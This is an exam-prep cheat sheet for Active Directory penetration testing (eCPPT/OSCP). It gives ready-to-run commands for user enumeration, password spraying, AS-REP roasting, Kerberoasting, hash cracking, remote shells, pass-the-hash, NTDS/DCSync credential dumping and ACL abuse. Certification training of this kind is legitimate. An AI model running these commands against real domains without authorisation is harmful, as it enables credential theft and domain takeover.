AD Tools Reference — What Each Tool Does and Where It Works
Quick reference for every AD tool you need. Organized by what they DO, not by name. Each tool lists: what it does, when to use it, eCPPT available?, OSCP available?
FINDING USERNAMES (Phase 1 — no creds needed)
nxc (NetExec / CrackMapExec)
- What it does: Swiss army knife for AD. Talks to SMB, LDAP, WinRM. Enumerate users, shares, groups. Spray passwords. Check where creds work. Dump hashes.
- When to use: Almost every phase of the chain. Your go-to tool.
- eCPPT: YES (confirmed by multiple reviewers)
- OSCP: YES
- Key commands:
nxc smb <IP> -u '' -p '' --users # Enumerate users (null session)
nxc smb <IP> -u '' -p '' --shares # List shares (null session)
nxc smb <IP> -u '' -p '' --rid-brute # Find users by brute-forcing RIDs
nxc smb <IP> -u 'USER' -p 'PASS' --users # Enumerate users (with creds)
nxc smb <IP> -u 'USER' -p 'PASS' --shares # List shares (with creds)
nxc smb <IP> -u users.txt -p 'Password1!' --continue-on-success # Password spray
nxc smb <SUBNET>/24 -u 'USER' -p 'PASS' # Check where creds work (Pwn3d! = admin)
nxc smb <IP> -u 'USER' -p 'PASS' --sam # Dump local hashes
nxc smb <IP> -u 'USER' -p 'PASS' --lsa # Dump LSA secrets
nxc winrm <IP> -u 'USER' -p 'PASS' # Check if WinRM access works
kerbrute
- What it does: Checks if usernames are valid by asking Kerberos. DC responds differently for valid vs invalid users.
- When to use: Phase 1 — finding valid usernames when SMB null sessions are blocked.
- eCPPT: YES (confirmed pre-installed on exam Kali)
- OSCP: YES (you download it yourself)
- Install (not an apt package!):
# If you have Go installed (check: which go)
go install github.com/ropnop/kerbrute@latest
sudo cp ~/go/bin/kerbrute /usr/local/bin/kerbrute
sudo chmod +x /usr/local/bin/kerbrute
# If no ARM64 binary available (Apple Silicon), must build from source with Go
- Key command:
kerbrute userenum -d <DOMAIN> --dc <DC_IP> userlist.txt
- Wordlist priority order (fastest to slowest):
# 1. FIRST — small, fast, covers most real AD environments (~10k names)
/usr/share/seclists/Usernames/Names/names.txt
# 2. Tiny — just common service accounts
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
# 3. Good balance — 10k usernames
/usr/share/seclists/Usernames/xato-net-10-million-usernames-10000.txt
# 4. LAST RESORT — 10 million entries, takes hours
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
- ⚠️ WARNING: Never start with
xato-net-10-million-usernames.txt— it takes hours. Start withnames.txt, it covers most boxes in seconds.
rpcclient
- What it does: Talks directly to Windows RPC. Can enumerate users, groups, and more with null sessions.
- When to use: Phase 1 — backup for nxc if it doesn’t work.
- eCPPT: YES (pre-installed on Kali)
- OSCP: YES
- Key command:
rpcclient -U '' -N <DC_IP> -c 'enumdomusers'
rpcclient -U '' -N <DC_IP> -c 'enumdomgroups'
enum4linux
- What it does: Automated SMB/RPC enumeration script. Runs multiple enumeration queries at once.
- When to use: Phase 1 — quick automated scan for users, shares, groups.
- eCPPT: YES (pre-installed on Kali)
- OSCP: YES
- Key command:
enum4linux -U <DC_IP> # Users
enum4linux -a <DC_IP> # Everything
ldapsearch
- What it does: Queries LDAP directory directly. Can find users, groups, descriptions, and other AD attributes.
- When to use: Phase 1 — when you need specific AD attributes, or for anonymous LDAP queries.
- eCPPT: YES (pre-installed on Kali)
- OSCP: YES
- Key command:
ldapsearch -x -H ldap://<DC_IP> -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
GETTING HASHES WITHOUT CREDS (Phase 2-3)
impacket-GetNPUsers (AS-REP Roasting)
- What it does: Finds accounts with “Do not require Kerberos pre-authentication” and gets their hash WITHOUT needing a password.
- When to use: Phase 2 — FIRST attack after finding usernames. Before any brute-forcing.
- eCPPT: YES (available)
- OSCP: YES
- Why it works: Accounts with pre-auth disabled let the DC hand you a hash for free.
- Key command:
impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC_IP> -usersfile valid_users.txt -format hashcat -outputfile asrep.txt
- Hashcat mode: 18200
- John:
john asrep.txt --wordlist=rockyou.txt
GETTING HASHES WITH CREDS (Phase 7)
impacket-GetUserSPNs (Kerberoasting)
- What it does: Requests service tickets for accounts with SPNs. The ticket is encrypted with the service account’s password — crack it offline.
- When to use: Phase 7 — AFTER getting first creds. Any authenticated user can do this.
- eCPPT: YES
- OSCP: YES
- Why it works: Any domain user can request a service ticket. The DC encrypts it with the service account’s password hash.
- Key command:
impacket-GetUserSPNs <DOMAIN>/'USER':'PASS' -dc-ip <DC_IP> -request -outputfile kerberoast.txt
- Hashcat mode: 13100
- John:
john kerberoast.txt --wordlist=rockyou.txt
AS-REP vs Kerberoasting — How to Remember
| AS-REP Roasting | Kerberoasting | |
|---|---|---|
| Needs creds? | NO | YES |
| Target | Users with “no preauth” | Service accounts with SPNs |
| Impacket tool | GetNPUsers | GetUserSPNs |
| Hashcat mode | 18200 | 13100 |
| When in chain | Phase 2 (before creds) | Phase 7 (after creds) |
CRACKING HASHES
hashcat
- What it does: Cracks password hashes using GPU (or CPU). Fast but sometimes buggy.
- eCPPT: YES (but known to have issues — always have john as backup)
- OSCP: YES
- Key commands:
hashcat -m 18200 asrep.txt wordlist.txt # AS-REP hashes
hashcat -m 13100 kerberoast.txt wordlist.txt # Kerberos TGS hashes
hashcat -m 5600 ntlmv2.txt wordlist.txt # NTLMv2 hashes
hashcat -m 1000 ntlm.txt wordlist.txt # NTLM hashes
john (John the Ripper)
- eCPPT: YES
- OSCP: YES
- Key commands:
john hash.txt --wordlist=rockyou.txt # Crack with wordlist
john hash.txt --show # Show cracked passwords
MAPPING THE DOMAIN (Phase 6)
bloodhound-python
- What it does: Collects all AD data (users, groups, permissions, computers) from Kali. Creates JSON files for BloodHound GUI.
- When to use: Phase 6 — IMMEDIATELY after getting first creds.
- eCPPT: YES (available on Kali)
- OSCP: YES
- Key command:
bloodhound-python -u 'USER' -p 'PASS' -ns <DC_IP> -d <DOMAIN> -c All
BloodHound GUI (Community Edition)
- What it does: Visualizes AD data and shows attack paths to Domain Admin.
- When to use: After collecting data with bloodhound-python. Upload JSON files, search for your user, use PATHFINDING.
- eCPPT: YES (pre-installed on exam Kali)
- OSCP: YES
- Key actions:
- Upload JSON files (drag and drop)
- Search for your user → right-click → Mark as Owned
- PATHFINDING: start = your user, end = Domain Admins
- Click edges between nodes to see relationship type and abuse instructions
GETTING SHELLS (Phase 8)
evil-winrm
- What it does: Connects to Windows via WinRM (port 5985). Gives interactive PowerShell shell. Best for uploading/downloading files.
- When to use: When port 5985 is open and you have valid creds.
- eCPPT: YES (but known broken — use Docker workaround:
docker run --rm -ti oscarakaelvis/evil-winrm) - OSCP: YES
- Key commands:
evil-winrm -i <IP> -u 'USER' -p 'PASS'
evil-winrm -i <IP> -u 'USER' -H '<NTLM_HASH>' # Pass-the-Hash
impacket-psexec
- What it does: Creates a service on the target via SMB, gives you a SYSTEM shell. Noisy but effective.
- When to use: When you have admin creds and need a SYSTEM shell.
- eCPPT: YES
- OSCP: YES
- Key commands:
impacket-psexec '<DOMAIN>/<USER>:<PASS>'@<IP>
impacket-psexec '<DOMAIN>/<USER>'@<IP> -hashes :<NTLM_HASH> # Pass-the-Hash
impacket-wmiexec
- What it does: Similar to psexec but stealthier. Uses WMI instead of creating a service.
- When to use: When psexec doesn’t work or you want less noise.
- eCPPT: YES
- OSCP: YES
- Key command:
impacket-wmiexec '<DOMAIN>/<USER>:<PASS>'@<IP>
xfreerdp
- What it does: RDP client. Gives you a full graphical desktop.
- When to use: When port 3389 is open, or when you need GUI access.
- eCPPT: YES
- OSCP: YES
- Key command:
xfreerdp /u:'USER' /p:'PASS' /v:<IP> /cert-ignore
DUMPING CREDENTIALS (Phase 9)
impacket-secretsdump
- What it does: Dumps all hashes from a machine (SAM, LSA, NTDS.dit). Also does DCSync attacks to pull every hash in the domain.
- When to use: Phase 9 — on every machine you compromise. Phase 10 — DCSync when you have DA or DCSync rights.
- eCPPT: YES
- OSCP: YES
- Key commands:
impacket-secretsdump '<DOMAIN>/<USER>:<PASS>'@<IP> # Dump everything
impacket-secretsdump '<DOMAIN>/<USER>'@<IP> -hashes :<HASH> # With hash
impacket-secretsdump -just-dc-ntlm '<DOMAIN>/<USER>:<PASS>'@<DC_IP> # DC only — all domain hashes
Meterpreter + Kiwi (Metasploit)
- What it does: Built-in credential dumper in Metasploit. Loads the Kiwi extension (Mimikatz) to dump hashes, passwords, tickets.
- When to use: When you have a Meterpreter shell on a compromised machine.
- eCPPT: YES — UNRESTRICTED (use on every machine!)
- OSCP: LIMITED — only one machine
- Key commands:
meterpreter> load kiwi
meterpreter> creds_all # All credentials in memory
meterpreter> lsa_dump_sam # Local account hashes
meterpreter> lsa_dump_secrets # Service account passwords
meterpreter> hashdump # Quick NTLM hash dump
MODIFYING AD OBJECTS (ACL Abuse)
net rpc
- What it does: Modifies AD groups and user passwords remotely from Kali. Built-in Linux command.
- When to use: When BloodHound shows GenericAll over a group (add yourself) or ForceChangePassword over a user.
- eCPPT: YES (built into Linux/Kali)
- OSCP: YES
- Key commands:
# Add user to a group
net rpc group addmem "GROUP_NAME" "USERNAME" -U '<DOMAIN>/<USER>%<PASS>' -S <DC_IP>
# Change a user's password
net rpc password "TARGET_USER" "NewP@ss123!" -U '<DOMAIN>/<USER>%<PASS>' -S <DC_IP>
impacket-dacledit
- What it does: Modifies permissions (ACLs/DACLs) on AD objects. Can grant DCSync rights.
- When to use: When BloodHound shows WriteDACL over the domain.
- eCPPT: May or may not be on exam Kali (newer tool)
- OSCP: May or may not be available
- Key command:
impacket-dacledit -action 'write' -rights 'DCSync' -principal 'USER' '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP>
- Alternative if not available: Use PowerView from a Windows shell or evil-winrm
CRITICAL REMINDERS FOR EXAMS
eCPPT Specific:
- Metasploit is FULLY UNRESTRICTED — use it on everything
- Use Desktop wordlists in order: common_corporate_passwords.lst → seasons.txt → months.txt → xato-10k → rockyou
- Evil-WinRM may be broken — use Docker workaround
- hashcat may be buggy — use john as backup
- No internet access — only pre-installed tools
- Always use single quotes when saving hashes: echo ‘$hash’ > file.txt
OSCP Specific:
- Metasploit limited to ONE machine
- Must write a report
- AI/LLM usage prohibited
- Proctored exam
Both Exams:
- Every new credential → spray it immediately across all machines
- Dump creds on EVERY machine you compromise
- Track all creds in a table: username | password/hash | source | where it works